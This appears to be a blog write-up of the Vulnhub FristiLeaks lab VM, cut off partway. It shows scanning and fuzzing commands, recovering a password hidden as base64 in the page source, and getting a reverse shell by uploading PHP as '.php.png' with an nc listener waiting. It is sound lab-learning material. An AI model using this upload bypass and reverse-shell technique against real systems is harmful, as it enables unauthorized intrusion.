I"Þ<p>Fun VM and did it on time! <a href="https://www.vulnhub.com/entry/fristileaks-13,133/">Fristileaks</a>
<p>So, the usual stuff:

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nb">sudo </span>netdiscover <span class="nt">-r</span> 192.168.0.0/16</code></pre></figure>

<p> My target is 192.168.1.90 .

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nb">sudo </span>nmap <span class="nt">-O</span> <span class="nt">-sT</span> 192.168.1.90</code></pre></figure>

<pre>
Starting Nmap 6.47 ( http://nmap.org ) at 2016-06-01 22:16 WEST
Nmap scan report for 192.168.1.90
Host is up (0.00052s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:A5:A6:76 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
</pre>
<p> Found a port 80 open. Opened it in firefox and simple page with a image.

<figure class="highlight"><pre><code class="language-bash" data-lang="bash">python wfuzz.py <span class="nt">-c</span> <span class="nt">-z</span> file,wordlist/general/common.txt <span class="nt">--hc</span> 404   http://192.168.1.90/FUZZ</code></pre></figure>

<p>Only found one dir, "images".
<p>In that dir, there was an image http://192.168.1.90/images/3037440.jpg saying "this is not the url you're looking for" ... so what is the url ? Maybe hidden in the image as metadata?

<figure class="highlight"><pre><code class="language-bash" data-lang="bash">exiftool 3037440.jpg</code></pre></figure>

<p>Nope.
<p>After a while ... a long while, trying to think how to find the correct url i fired nmap and nikto, maybe they could help me.

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nb">sudo </span>nmap <span class="nt">-A</span> 192.168.1.90</code></pre></figure>

<p>Found some Paths! Like /cola /sisi /beer ... nothing really. Neither one was helping showing the same image grrr...

<figure class="highlight"><pre><code class="language-bash" data-lang="bash">./nikto.pl <span class="nt">-mutate</span> 1 <span class="nt">-h</span> 192.168.1.90
./nikto.pl <span class="nt">-mutate</span> 1,2,3,4,5,6 <span class="nt">-h</span> 192.168.1.90</code></pre></figure>

<p>A big "nope". After another longgg while it hit me!! "/cola", "/beer" and the "Keep calm and drink fristi"!DUH! So, http://192.168.1.90/fristi/
<p> A login-password form finally and an image! I did a view source and found a comment made by the programmer called eezeepz  and a meta tag. I first pointed at the meta tag saying:
<pre>
super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it."
</pre>
<p>Scrolling down ther was some base64 code commented. Well i tried to insert that code in the image binary and it returned an image saying something like "kekekekekKEKEKEKEK". "what is this?" I thought, "this can't be a password" but i tried it anyway, login: the user in the comment, password the text in the image and...
<p>Login!
<p>Now i could upload a file, the server runs php so i thought of php-reverse-shell upload... error file format not accepted. However, i knew some versions allow something like XXX.php.png and it will run the php code! I renamed it to .png and use the usual suspect for waiting a connection:

<figure class="highlight"><pre><code class="language-bash" data-lang="bash">nc <span class="nt">-lnvvp</span> 12344</code></pre></figure>

<p>Firefox pointing to http://192.168.1.90/fristi/uploads/php-reverse-shell.php.png and
<p>SHELL!

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nb">uname</span> <span class="nt">-a</span></code></pre></figure>

<pre>
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
</pre>
<p>Walking down the /home got to eezeepz home dir, and it had some notes.txt on it:
<pre>
o EZ,
</pre></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p>
:ET